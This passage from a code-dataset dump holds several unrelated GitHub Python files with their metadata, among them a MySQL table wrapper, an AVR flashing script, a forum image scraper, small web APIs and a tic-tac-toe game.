model\r\n\r\nwith open('data/ai_logistic_regression.pkl','rb') as f:\r\n model = pickle.load(f)\r\n\r\n# Set data for specific person for specific day of infection\r\n\r\nwoj = 0 # region by TERYT data code\r\npow = 0 # area by TERYT data code\r\nplec = 0 # gender ('Male': 1, 'Female': 2)\r\nwiek = 0 # age\r\nprod = 0 # vaccination ('Astra Zeneca': 1, 'Johnson&Johnson': 2, 'Moderna': 3, 'Pfizer': 4, None: 5)\r\ndaw = 0 # number of doses ('one': 1, 'full': 2, 'booster': 3, 'supplemental': 4, None: 5)\r\nodp = 0 # decreased immunity ('no': 0, 'yes': 1)\r\nyear = 0 # year\r\nmon = 0 # month\r\nday = 0 # day of the month\r\n\r\n# Results: 0-1 result and % probability\r\n\r\nprint('Result:')\r\n\r\nresult = model.predict([[woj,pow,plec,wiek,prod,daw,odp,year,mon,day]])\r\n\r\nprint(result)\r\n\r\nprint('Probability:')\r\n\r\nresult = model.predict_proba([[woj,pow,plec,wiek,prod,daw,odp,year,mon,day]])\r\n\r\nprint(result)","repo_name":"marek-strzalkowski/Poseidon-AI","sub_path":"Poseidon_AI/AI_program.py","file_name":"AI_program.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35382294886","text":"from src.BaseDataTable import BaseDataTable\nimport src.dbutils as dbutils\nimport json\nimport pandas as pd\nimport pymysql\n\n\nclass RDBDataTable(BaseDataTable):\n\n \"\"\"\n The implementation classes (XXXDataTable) for CSV database, relational, etc. with extend the\n base class and implement the abstract methods.\n \"\"\"\n\n def __init__(self, table_name, connect_info, key_columns):\n \"\"\"\n\n :param table_name: Logical name of the table.\n :param connect_info: Dictionary of parameters necessary to connect to the data.\n :param key_columns: List, in order, of the columns (fields) that comprise the primary key.\n \"\"\"\n if table_name is None or connect_info is None:\n raise ValueError(\"Invalid input.\")\n\n self._data = {\n \"table_name\": table_name,\n \"connect_info\": connect_info,\n \"key_columns\": key_columns\n }\n\n cnx = dbutils.get_connection(connect_info)\n if cnx is not None:\n self._cnx = cnx\n else:\n raise Exception(\"Could not get a connection.\")\n\n def __str__(self):\n\n result = \"RDBDataTable:\\n\"\n result += json.dumps(self._data, indent=2, default=str)\n\n row_count = self.get_row_count()\n result += \"\\nNumber of rows = \" + str(row_count)\n\n some_rows = pd.read_sql(\n \"select * from \" + self._data[\"table_name\"] + \" limit 10\",\n con=self._cnx\n )\n result += \"First 10 rows = \\n\"\n result += str(some_rows)\n\n return result\n\n def get_row_count(self):\n\n row_count = self._data.get(\"row_count\", None)\n if row_count is None:\n sql = \"select count(*) as count from \" + self._data[\"table_name\"]\n res, d = dbutils.run_q(sql, args=None, fetch=True, conn=self._cnx, commit=True)\n row_count = d[0]['count']\n self._data['\"row_count'] = row_count\n\n return row_count\n\n def find_by_template(self, template, field_list=None, limit=None, offset=None, order_by=None):\n \"\"\"\n\n :param template: A dictionary of the form { \"field1\" : value1, \"field2\": value2, ...}\n :param field_list: A list of request fields of the form, ['fielda', 'fieldb', ...]\n :param limit: Do not worry about this for now.\n :param offset: Do not worry about this for now.\n :param order_by: Do not worry about this for now.\n :return: A list containing dictionaries. A dictionary is in the list representing each record\n that matches the template. 
The dictionary only contains the requested fields.\n \"\"\"\n sql, args = dbutils.create_select(table_name=self._data['table_name'], template=template, fields=field_list)\n res, d = dbutils.run_q(sql, args=args, conn=self._cnx, commit=True, fetch=True)\n return d\n\n def find_by_primary_key(self, key_fields, field_list=None):\n \"\"\"\n\n :param key_fields: The list with the values for the key_columns, in order, to use to find a record.\n :param field_list: A subset of the fields of the record to return.\n :return: None, or a dictionary containing the requested fields for the record identified\n by the key.\n \"\"\"\n key_cols = self._data.get('key_columns', None)\n if key_cols is None:\n raise ValueError(\"The key to success is quite literally that...\")\n template = dict(zip(key_cols, key_fields))\n output = self.find_by_template(template=template, field_list=field_list)\n\n if output is not None and len(output) > 1:\n output = None\n print('Specified primary key refers to more than one row!')\n elif output is not None and len(output) > 0:\n output = output[0]\n else:\n output = None\n\n return output\n\n def delete_by_template(self, template):\n \"\"\"\n\n :param template: Template to determine rows to delete.\n :return: Number of rows deleted.\n \"\"\"\n sql, args = dbutils.create_select(self._data['table_name'], template=template, fields=None, is_select=False)\n res = dbutils.run_q(sql, args=args, commit=True, conn=self._cnx, fetch=False)\n return res\n\n def delete_by_key(self, key_fields):\n \"\"\"\n\n Deletes the record that matches the key.\n\n :param key_fields: The list with the values for the key_columns, in order.\n :return: A count of the rows deleted.\n \"\"\"\n key_cols = self._data.get('key_columns', None)\n if key_cols is None:\n raise ValueError(\"The key to success is quite literally that...\")\n template = dict(zip(key_cols, key_fields))\n output = self.delete_by_template(template=template)\n return output\n\n def update_by_template(self, template, new_values):\n \"\"\"\n\n :param template: Template for rows to match.\n :param new_values: New values to set for matching fields.\n :return: Number of rows updated.\n \"\"\"\n sql, args = dbutils.create_update(self._data['table_name'], template=template, changed_cols=new_values)\n res = dbutils.run_q(sql, args=args, commit=True, conn=self._cnx, fetch=False)\n return res\n\n def update_by_key(self, key_fields, new_values):\n \"\"\"\n\n :param key_fields: List of values for the key fields.\n :param new_values: A dict of field:value to set for updated row.\n :return: Number of rows updated.\n \"\"\"\n key_cols = self._data.get('key_columns', None)\n if key_cols is None:\n raise ValueError(\"The key to success is quite literally that...\")\n template = dict(zip(key_cols, key_fields))\n output = self.update_by_template(template=template, new_values=new_values)\n return output\n\n def insert(self, new_record):\n \"\"\"\n\n :param new_record: A dictionary representing a row to add to the set of records.\n :return: None\n \"\"\"\n sql, args = dbutils.create_insert(self._data['table_name'], new_record)\n result, d = dbutils.run_q(sql, args=args, commit=True, fetch=False, conn=self._cnx)\n return result\n\n def get_rows(self):\n return self._rows\n","repo_name":"sdeka1997/COMS-W4111","sub_path":"HW_Assignments/HW1_Template/src/RDBDataTable.py","file_name":"RDBDataTable.py","file_ext":"py","file_size_in_byte":6119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20011850090","text":"import csv\r\nimport sys\r\nimport os\r\nos.system('echo Running 
Command...')\r\nos.system('ls -ltr')\r\n\r\ntxt_file = r\"mytxt.txt\"\r\ncsv_file = r\"mycsv.csv\"\r\n\r\nin_txt = open(txt_file, \"r\")\r\nout_csv = csv.writer(open(csv_file, 'wb'))\r\n\r\nfile_string = in_txt.read()\r\n\r\nfile_list = file_string.split('\\n')\r\n\r\nfor row in file_list: \r\n out_csv.writerow(row)\r\n\r\n\t","repo_name":"pswapnareddy/Walmart_Bigdata","sub_path":"Walmart/Q6.py","file_name":"Q6.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20558676089","text":"import datetime\n\nfrom django.db.models import Sum\nfrom django.db.models.functions import TruncDay, TruncMonth, TruncYear\n\nfrom oppia.test import OppiaTestCase\n\nfrom oppia.models import Course\nfrom oppia.views.utils import generate_graph_data\nfrom summary.models import CourseDailyStats\n\n\nclass OppiaViewUtilsTest(OppiaTestCase):\n\n fixtures = ['tests/test_user.json',\n 'tests/test_oppia.json',\n 'tests/test_quiz.json',\n 'tests/test_permissions.json',\n 'tests/test_coursedailystats.json',\n 'default_badges.json',\n 'tests/test_course_permissions.json']\n\n def test_graph_data_daily(self):\n course = Course.objects.get(pk=1)\n\n start_date = datetime.datetime(2017, 1, 1)\n end_date = datetime.datetime(2017, 12, 31)\n daily_stats = CourseDailyStats.objects.filter(course=course,\n day__gte=start_date,\n day__lte=end_date) \\\n .annotate(stat_date=TruncDay('day')) \\\n .values('stat_date', 'type') \\\n .annotate(total=Sum('total'))\n result = generate_graph_data(daily_stats)\n self.assertEqual(43, len(result))\n\n def test_graph_data_monthly(self):\n course = Course.objects.get(pk=1)\n\n start_date = datetime.datetime(2017, 1, 1)\n end_date = datetime.datetime(2017, 12, 31)\n monthly_stats = CourseDailyStats.objects \\\n .filter(course=course,\n day__gte=start_date,\n day__lte=end_date) \\\n .annotate(month=TruncMonth('day'),\n year=TruncYear('day')) \\\n .values('month', 'year', 'type') \\\n .annotate(total=Sum('total')) \\\n .order_by('year', 'month')\n result = generate_graph_data(monthly_stats, True)\n self.assertEqual(10, len(result))\n","repo_name":"DigitalCampus/django-oppia","sub_path":"tests/oppia/views/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"53"} +{"seq_id":"23261187279","text":"# This script creates .bin and .hex files from a given .c file and flashes the .hex file to a Microcontroller\nimport os\n#MCU=\"atmega328p\"\nMCU=\"atmega328\" # Arduino Uno\nF_CPU=16000000 # 16MHz\nCC=\"avr-gcc\"\nOBJCOPY=\"avr-objcopy\"\nCFLAGS=f\"-std=c99 -Wall -g -Os -mmcu={MCU} -DF_CPU={F_CPU} -I.\"\nTARGET=\"main_e\"\nSRCS=\"praktikum1_e.c\"\n\n# Create .bin and .hex files\ndef create():\n os.system(f\"{CC} {CFLAGS} -o {TARGET}.bin {SRCS}\")\n os.system(f\"{OBJCOPY} -j .text -j .data -O ihex {TARGET}.bin {TARGET}.hex\")\n print(f\"{TARGET}.bin and {TARGET}.hex have been created\")\n\n# Flash .hex files to Microcontroller\ndef flash():\n os.system(f\"avrdude -p {MCU} -c arduino -U flash:w:{TARGET}.hex:i -F -P /dev/ttyS4\")\n print(f\"{TARGET}.hex has been flashed to Microcontroller ({MCU})\")\n\n# Delete .bin and .hex files\ndef clean():\n os.system(\"rm -f *.bin *.hex\")\n print(\".bin and .hex files have been deleted\")\n\ndef main():\n print(\"################## AVR Flash Script ##################\")\n print(\"#\")\n print(\"# Choose between the following actions: create, 
flash or clean\")\n print(\"#\")\n print(\"# 1 - Create: Creates .bin and .hex files\")\n print(\"# 2 - Flash: Flashes .hex files to Microcontroller\")\n print(\"# 3 - Clean: Deletes .bin and .hex files from current directory\")\n result = input(\"# Input: \")\n if result == \"1\":\n create()\n elif result == \"2\":\n flash()\n elif result == \"3\":\n clean()\n else:\n print(\"Invalid input, please choose between 1, 2 or 3\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mjebalidev/micro_v1","sub_path":"avr_flash.py","file_name":"avr_flash.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15334776720","text":"#-*- coding:utf-8 -*-\nimport urllib\nfrom urllib import request\nfrom lxml import etree\n\nclass teba(object):\n def __init__(self):\n self.name=\"python\"\n self.begin=1\n self.end=3\n self.url=\"http://tieba.baidu.com/f?\"\n self.headers={\"User-Agent\" : \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1 Trident/5.0;\"}\n self.fileName=1\n\n def teba1(self):\n for page in range(self.begin,self.end):\n pn=(page-1)*50\n wo={'pn':pn,'kw':self.name}\n word=urllib.parse.urlencode(wo)\n myurl=self.url+word\n self.teba2(myurl)\n\n def teba2(self,myurl):\n req=request.Request(myurl,headers=self.headers)\n response=request.urlopen(req).read()\n html=etree.HTML(response)\n data=html.xpath('//div[@class=\"threadlist_lz clearfix\"]/div/a/@href')\n for da in data:\n da=\"http://tieba.baidu.com\"+da\n self.teba3(da)\n def teba3(self,da):\n req=request.Request(da,headers=self.headers)\n response=request.urlopen(req).read()\n html=etree.HTML(response)\n data=html.xpath('//img[@class=\"BDE_Image\"]/@src')\n for dat in data:\n self.teba4(dat)\n\n def teba4(self,dat):\n print(\"曼哥非诚勿扰:正在保存 图片第:\",self.fileName,\"....张\")\n response = request.urlopen(dat).read()\n file=open(r\"C:\\Users\\黎曼\\Desktop\\贴吧图片\\\\\"+str(self.fileName)+\".jpg\",\"wb\")\n file.write(response)\n file.close()\n self.fileName=self.fileName+1\n\n\n\n\nif __name__=='__main__':\n myteba=teba()\n myteba.teba1()\n\n","repo_name":"LMlmptm/python","sub_path":"我要自学网/百度贴吧3.py","file_name":"百度贴吧3.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5045532056","text":"from fastapi import FastAPI\nimport uvicorn\napp = FastAPI()\n\n@app.get(\"/\", tags=[\"Root\"])\nasync def read_root():\n return { \n \"message\": \"Welcome to my notes application, use the /docs route to proceed\"\n }\n \n \n\nif __name__ == \"__main__\":\n uvicorn.run(\"server.api:app\", host=\"0.0.0.0\", port=8000, reload=True)","repo_name":"rangel3l2/tecnoif","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35229521","text":"\"\"\"module containing API codebase\"\"\"\n\nimport logging\nimport json\nfrom typing import Union\n\nimport zipcodes\nfrom bottle import Bottle, abort, request, response\nfrom pydantic import ValidationError\n\nfrom config import LISTEN_ADDRESS, LISTEN_PORT, COUNTY_MAPPINGS\nfrom models import ValidationRequest\nfrom validation import validate_numbers\n\nLOGGER = logging.getLogger(__name__)\n\nAPP = Bottle()\n\n@APP.route('/validate', method='POST')\ndef validate():\n \"\"\"API route used to validate a collection of\n phone numbers\"\"\"\n\n LOGGER.debug('received request to 
validate phone numbers')\n # return 400 error if no request body is given\n if not request.json:\n LOGGER.error('received invalid JSON request')\n abort(400, 'invalid request body')\n\n # parse request body from JSON and convert to pydantic model\n try:\n body = ValidationRequest(**dict(request.json))\n except ValidationError:\n LOGGER.exception('unable to validate request body')\n abort(400, 'invalid request body')\n\n # validate phone numbers using python library\n valid, invalid = validate_numbers(body.numbers, body.country_code)\n LOGGER.debug('returning valid numbers %s', valid)\n return {'http_code': 200, 'data': {'valid': valid, 'invalid': invalid}}\n\ndef get_economic_region(county: str) -> Union[dict, None]:\n \"\"\"Function used to extract economic region\n from mappings based on county\"\"\"\n\n # remove 'county' word from county\n county = county.lower().replace(' county', '')\n LOGGER.debug('fetching council mapping for county %s', county)\n return COUNTY_MAPPINGS.get(county, None)\n\n@APP.route('/zipcode/', method=['GET'])\ndef zipcode(code: str):\n \"\"\"API Route to return data about zip codes\"\"\"\n\n try:\n LOGGER.debug('received request to analyze zip code %s', code)\n if not zipcodes.is_real(code):\n LOGGER.error('received invalid zip code \\'%s\\'', code)\n abort(400, 'invalid zip code')\n\n # get zip code data from database\n data = zipcodes.matching(code)\n if not data:\n LOGGER.warning('cannot find data for zipcode %s', code)\n abort(400, 'invalid zip code')\n\n if len(data) > 1:\n LOGGER.warning('found multiple data entries for single zip code')\n abort(422, 'multiple entries found for given zip code')\n data = data[0]\n\n # extract county and retrieve council mapping if exists\n economic_region = get_economic_region(data.get('county', ''))\n if economic_region is not None:\n data['economic_region'] = economic_region.title()\n return {'http_code': 200, 'data': data}\n\n except (ValueError, TypeError):\n LOGGER.exception('unable to parse zipcode')\n abort(400, 'invalid zip code')\n\n\nif __name__ == '__main__':\n\n def error_handler(error_details: str) -> dict:\n \"\"\"Custom error handler to convert errors\n to JSON Responses\"\"\"\n\n code = response.status_code\n message = response.body\n\n response.content_type = 'application/json'\n if 'Origin' in request.headers:\n response.headers['Access-Control-Allow-Origin'] = request.headers['Origin']\n else:\n response.headers['Access-Control-Allow-Origin'] = '*'\n return json.dumps({'success': False, 'http_code': code, 'message': message})\n\n APP.default_error_handler = error_handler\n APP.run(host=LISTEN_ADDRESS, port=LISTEN_PORT, server='waitress')","repo_name":"PSauerborn/texas-real-foods","sub_path":"python/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3481,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"134019873","text":"import tkinter\n\nmasu = [\n [1, 0, 0],\n [0, 0, 2],\n [0, 0, 0]\n]\n\ndef masume():\n for i in range(1, 3):\n cvs.create_line(200*i, 0, 200*i, 600, fill=\"gray\", width=8)\n cvs.create_line(0, i*200, 600, i*200, fill=\"gray\", width=8)\n for y in range(3):\n for x in range(3):\n X = x * 200\n Y = y * 200\n if masu[y][x] == 1:\n cvs.create_oval(X+20, Y+20, X+180, Y+180, outline=\"blue\", width=12)\n if masu[y][x] == 2:\n cvs.create_line(X+20, Y+20, X+180, Y+180, fill=\"red\", width=12)\n cvs.create_line(X+180, Y+20, X+20, Y+180, fill=\"red\", width=12)\n\nroot = 
tkinter.Tk()\nroot.title(\"Tic-Tac-Toe\")\nroot.resizable(False, False)\ncvs = tkinter.Canvas(width=600, height=600, bg=\"white\")\ncvs.pack()\nmasume()\nroot.mainloop()\n","repo_name":"tossy0130/python_game_algorithm_01","sub_path":"PyG_algorithm/Chapter5/list5_2.py","file_name":"list5_2.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39384926222","text":"import ntptime\nfrom time import sleep\nfrom machine import ADC, deepsleep, DEEPSLEEP, RTC, Timer\nfrom boot import connectWifi, disconnectWifi\nfrom elasticLog import logger\n\nsignalPin = ADC(0)\nNTP_OFFSET = 946684800\nDEEPSLEEP_TIME=30 # in seconds\n\ndef logMoisture(reading):\n try:\n time = ntptime.time()\n time = time + NTP_OFFSET\n\n data = {\n '@timestamp': int(time*1000),\n 'moisture': reading,\n 'message': 'Moisture reading',\n 'plant_id': 2,\n 'plant_name': 'Gulrorbambus'\n }\n return logger('Moisture reading', data=data)\n except OSError as e:\n logger('Error', data={'message': 'Error fetching ntp time', 'error': e})\n\n\ndef watercontent():\n moistureReading = signalPin.read()\n\n print(logMoisture(moistureReading))\n # A little extra time alive for file transfere\n print('3 second upload window before deepsleep')\n sleepTriggerTimer = Timer(-1)\n sleepTriggerTimer.init(period=3000, mode=Timer.ONE_SHOT, callback=_sleep)\n\ndef _sleep(_):\n print('deepsleep starting for {} seconds'.format(DEEPSLEEP_TIME))\n rtc = RTC()\n rtc.irq(trigger=rtc.ALARM0, wake=DEEPSLEEP)\n rtc.alarm(rtc.ALARM0, DEEPSLEEP_TIME * 1000)\n deepsleep()","repo_name":"KevinMidboe/ESP-Plant-Logger","sub_path":"watercontent.py","file_name":"watercontent.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19613453019","text":"import sys\nimport time\nfrom datetime import datetime, timedelta\nfrom random import choice, randint\nfrom uuid import uuid4\n\nimport requests\nfrom faker import Faker\nfrom faker.providers import company\n\nfake = Faker()\nfake.add_provider(company)\n\n\nTICKET_API_URL = 'https://3v6s2g0n3b.execute-api.us-east-1.amazonaws.com/dev/ticket'\n\n\ndef generate_data(\n items,\n total_of_opened_items,\n total_of_closed_items,\n total_of_approved_items,\n total_of_deleted_items,\n):\n tickets_id = []\n\n for item in range(1, items + 1):\n data = {\n 'owner_id': str(uuid4()),\n 'subject': fake.catch_phrase(),\n 'text': fake.text(),\n }\n\n response = requests.post(\n url=TICKET_API_URL, json=data, headers={'Content-Type': 'application/json'}\n )\n total_of_opened_items += 1\n time.sleep(0.1)\n\n if item % 2 == 0:\n tickets_id.append(response.json()['ticket_id'])\n\n for ticket_id in tickets_id[:]:\n status = choice(['closed', 'deleted'])\n data = {'status': status}\n\n response = requests.patch(\n url=f'{TICKET_API_URL}/{ticket_id}',\n json=data,\n headers={'Content-Type': 'application/json'},\n )\n\n if status == 'deleted':\n tickets_id.remove(ticket_id)\n total_of_deleted_items += 1\n else:\n total_of_closed_items += 1\n\n time.sleep(0.1)\n\n for idx in range(len(tickets_id)):\n if idx % 2 == 0:\n requests.patch(\n url=f'{TICKET_API_URL}/{tickets_id[idx]}',\n json={'status': 'approved'},\n headers={'Content-Type': 'application/json'},\n )\n total_of_approved_items += 1\n time.sleep(0.05)\n\n\nif __name__ == '__main__':\n total_of_opened_items = 0\n total_of_closed_items = 0\n total_of_approved_items = 0\n total_of_deleted_items = 0\n start_time = 
time.perf_counter()\n\n    max_interactions = int(sys.argv[1] if len(sys.argv) > 1 else 10)\n\n    print(f'starting generator for {max_interactions} rounds')\n    for round_number in range(1, max_interactions + 1):\n        start_round_time = time.perf_counter()\n        random_value = randint(1, 11)\n        print(f'starting round {round_number} with {random_value} values')\n        generate_data(\n            random_value,\n            total_of_opened_items,\n            total_of_closed_items,\n            total_of_approved_items,\n            total_of_deleted_items,\n        )\n        total_of_round_time = round((time.perf_counter() - start_round_time) / 60, 2)\n        print(f'round {round_number} finished in {total_of_round_time} minutes')\n        # fmt: off\n        print(f'waiting next round starting on {(datetime.now() + timedelta(minutes=1)).isoformat()}\\n')\n        time.sleep(60)\n\n    total_of_time = round((time.perf_counter() - start_time) / 60, 2)\n\n    print(\n        f'''\n        Summary:\n            Opened: {total_of_opened_items}\n            Closed: {total_of_closed_items}\n            Approved: {total_of_approved_items}\n            Deleted: {total_of_deleted_items}\n\n        Time elapsed: {total_of_time} minutes\n        '''\n    )\n","repo_name":"fernandoroch4/cloudwatch-emf","sub_path":"scripts/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8170784928","text":"# -*-coding:UTF-8 -*\nfrom flask import Blueprint, Flask, jsonify, make_response, request, abort, render_template, session\nimport helpers\nimport json\nfrom glob import Models\nimport base64\nimport loginmanager\n\nfrom users import Users\nfrom products import Products\nfrom bids import Bids\n\nbid = Blueprint('bid', __name__, '')\n\n# ADD\n@bid.route('/', methods=['POST'])\ndef new_bid():\n\tresp = helpers.get_response(request) \n\tloginmanager.verify_token(resp)\n\tnewbid = Bids().new(resp)\n\tnewbid.save()\n\treturn jsonify({'status':'New bid ok', 'bid':newbid._to_json()}), 200 \n\n# EDIT\n@bid.route('/', methods=['POST'])\ndef edit_bid(bid_id):\n\tresp = helpers.get_response(request)\n\t\n\teditBid = Models().getBy('bids', 'id', bid_id) \n\tloginmanager.has_right(editBid[0], resp = resp)\n\tif editBid is None:\n\t\treturn \"Bid not found\", 404\n\teditBid[0].edit(resp)\n\teditBid[0].save()\n\treturn jsonify({'bid': editBid[0].json()}), 200\n\n# GET\n@bid.route('/', methods=['GET'])\ndef get_bid(bid_id):\n\tresp = helpers.get_response(request)\n\n\tgetBid = Models().getBy('bids', 'id', bid_id) \n\tif getBid is None:\n\t\treturn \"Bid not found\", 404\n\treturn jsonify({'bid' : getBid[0].json()})\n\n# DELETE\n@bid.route('/', methods=['DELETE'])\ndef delete_bid(bid_id):\n\tresp = helpers.get_response(request)\n\tloginmanager.verify_token(resp)\n\tret = Models().delete('bids', 'id', id=bid_id)\n\tif ret == False : \n\t\treturn 'KO', 401\n\treturn 'OK', 200","repo_name":"thromera/Ubid","sub_path":"remise_trois/rendu1/flask/bids_api.py","file_name":"bids_api.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"631688641","text":"# tracking phone numbers\nimport phonenumbers\n\nfrom phonenumbers import carrier, geocoder, timezone\nfrom phonenumbers.phonenumberutil import number_type\n\n# mobileNo = phonenumbers.parse(input(\"Enter the phone number with country code\"))\nnum = input(\"Enter the number you want to track: \")\nphone = phonenumbers.parse(num)\ntime = timezone.time_zones_for_number(phone)\nservice = carrier.name_for_number(phone, \"en\")\nregistration = 
geocoder.description_for_number(phone, \"en\")\n\nprint(phone)\nprint(time)\nprint(\"Service Provider: \", service) # doesn't work\nprint(\"Country is \", registration)\n# print(timezone.time_zones_for_number(mobileNo))\n# print(carrier.name_for_number(mobileNo, \"en\"))\n# print(geocoder.description_for_number(mobileNo, \"en\"))\n# print(\"valid mobile no: \", phonenumbers.is_valid_number(mobileNo))\n# print(\"checking possibility of number: \", phonenumbers.is_possible_number(mobileNo))\n","repo_name":"ricardogodinez/python-test","sub_path":"phonenumber/# tracking phone numbers.py","file_name":"# tracking phone numbers.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20540276377","text":"from app.core.config import DB_LINK, DB\nfrom bson.objectid import ObjectId\nimport motor.motor_asyncio\nfrom fastapi_users.db import BeanieUserDatabase\nfrom .models import User, Direction\n\nclient = motor.motor_asyncio.AsyncIOMotorClient(\n DB_LINK, uuidRepresentation=\"standard\"\n)\ndb = client[DB]\nusers = db['User']\nfiles = db['files']\napplications = db['applications']\ndirections = db['directions']\n\nasync def save_file(file):\n await applications.insert_one(file)\n await users.update_one({'_id' : file['user_id']}, {'$push' : {'applications' : file['_id']}})\n await directions.update_one({'_id': file['direction_id']}, {'$push' : {'applications' : file['_id']}})\n\nasync def get_direction_id(direction_name):\n direction = await directions.find_one({'name': direction_name})\n if direction:\n return direction['_id']\n direction = Direction(direction_name)\n await directions.insert_one(direction.__dict__)\n return direction._id\n\nasync def get_directions():\n result = []\n async for dir in directions.find({}, {'_id': 0, 'name' : 1}):\n result.append(dir)\n return result\n\nasync def accept_application(file_id):\n file = await applications.find_one_and_delete({'_id' : ObjectId(file_id)})\n await files.insert_one(file)\n user_id = file['user_id']\n direction_id = file['direction_id']\n await users.update_one({'_id' : user_id}, {'$pull' : {'applications' : ObjectId(file_id)}})\n await users.update_one({'_id' : user_id}, {'$push' : {'projects' : ObjectId(file_id)}})\n await directions.update_one({'_id' : direction_id}, {'$pull' : {'applications' : ObjectId(file_id)}})\n await directions.update_one({'_id' : direction_id}, {'$push' : {'projects' : ObjectId(file_id)}})\n\nasync def reject_application(file_id):\n file = await applications.find_one_and_delete({'_id' : ObjectId(file_id)})\n await users.update_one({'_id' : file['user_id']}, {'$pull' : {'applications' : ObjectId(file_id)}})\n direction = await directions.find_one({'_id': file['direction_id']})\n if direction['projects'] == [] and len(direction['applications']) == 1:\n await directions.delete_one({'_id': direction['_id']})\n else:\n await directions.update_one({'_id' : direction['_id']}, {'$pull' : {'applications' : ObjectId(file_id)}})\n\nasync def get_file_content(file_id, isApplications = False):\n collection = get_collection(isApplications)\n return await collection.find_one({'_id': ObjectId(file_id)}, {'content': 1, 'keywords': 1, '_id': 0, 'preview': 1})\n\nasync def get_files_preview(isApplications = False):\n result = []\n collection = get_collection(isApplications)\n async for x in collection.find({}, {\"_id\": 1, \"preview\": 1, 'keywords': 1}):\n result.append(x)\n return result\n\nasync def get_user_files(user_id, 
isApplications = False):\n result = []\n collection = get_collection(isApplications)\n async for x in collection.find({'user_id' : ObjectId(user_id)}, {'preview': 1, '_id' : 1, 'keywords': 1}):\n result.append(x)\n return result\n\ndef get_collection(isApplications):\n if isApplications:\n return applications\n return files\n\nasync def get_user_db():\n yield BeanieUserDatabase(User)\n","repo_name":"Chronos196/web-noc","sub_path":"app/db/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":3204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30596424468","text":"#!/usr/bin/python3\n\nimport sys\n\nkey, key2, previous_key, total = None, None, None, 0\n\nfor line in sys.stdin:\n key2, count = line.strip().split('\\t')\n count = int(count)\n if key2!=key:\n if total==1:\n print(key)\n key, total, previous_key = key2, count, key\n else:\n total += count\n\nif key2 != previous_key:\n print(key2)\n","repo_name":"kotsabo/processing_webdata_mapreduce","sub_path":"Task2/reducer02.py","file_name":"reducer02.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20516069179","text":"import sys\n\n\"\"\"get the weight of the given node and its subtowers\"\"\"\ndef getWeight(tower, subTowers, weights):\n weight = weights[tower] #include ourselve\n for subTower in subTowers[tower]:\n weight += getWeight(subTower, subTowers, weights)\n #print(\"tower: \", tower, \" has self weight=\", weights[tower], \"final=\", weight)\n return weight\n\n\"\"\"find the most common weight in set of 3+\"\"\"\ndef correctWeight(children, subTowers, weights):\n clone = children.copy()\n avg = [getWeight(clone.pop(), subTowers, weights) for i in range(3)]\n if avg[0] == avg[1]:\n return avg[0]\n if avg[1] == avg[2]:\n return avg[1]\n return avg[2]\n\ndef bfs(node, subTowers, weights):\n if len(subTowers[node]) == 0:\n print(\"fault at\", node)\n return -1\n children = subTowers[node]\n wanted = correctWeight(children, subTowers, weights)\n problem = \"\"\n for i in children:\n if getWeight(i, subTowers, weights) != wanted:\n problem = i\n break\n if problem == \"\":\n return -1\n if bfs(i, subTowers, weights) == -1:\n print(i, \"has weight\", weights[i], \"expected\", wanted - len(subTowers[i]) * correctWeight(subTowers[i], subTowers, weights))\n return wanted\n\n\nfile = open(sys.argv[1])\nbottom = \"\"\nweights = dict()\nsubTowers = dict()\nabove = set()\nfor line in file:\n parts = line.split()\n weights[parts[0]] = int(parts[1][1:-1])\n subTowers[parts[0]] = set()\n for i in parts[3:]:\n program = \"\"\n if (i.endswith(\",\")):\n program = i[0:-1]\n else:\n program = i\n above.add(program)\n subTowers[parts[0]].add(program)\nfile.close()\n\nroot = set(weights.keys()).difference(above).pop()\n\nbfs(root, subTowers, weights)\n\n","repo_name":"Paul-Haley/adventofcode_2017","sub_path":"day07/day07b.py","file_name":"day07b.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29925777946","text":"import tkinter as tk\r\nimport sqlite3\r\nimport os\r\nfrom IncludeDatabase import include_database\r\nfrom AddDatabaseWindow import add_database_window\r\n\r\ncurrent_database = \"\"\r\n\r\ndef exit(root):\r\n\troot.destroy()\r\n\r\ndef select_database_window():\r\n\t\r\n\tdef get_name_files():\r\n\t\tname_files = []\r\n\t\tfor filename in 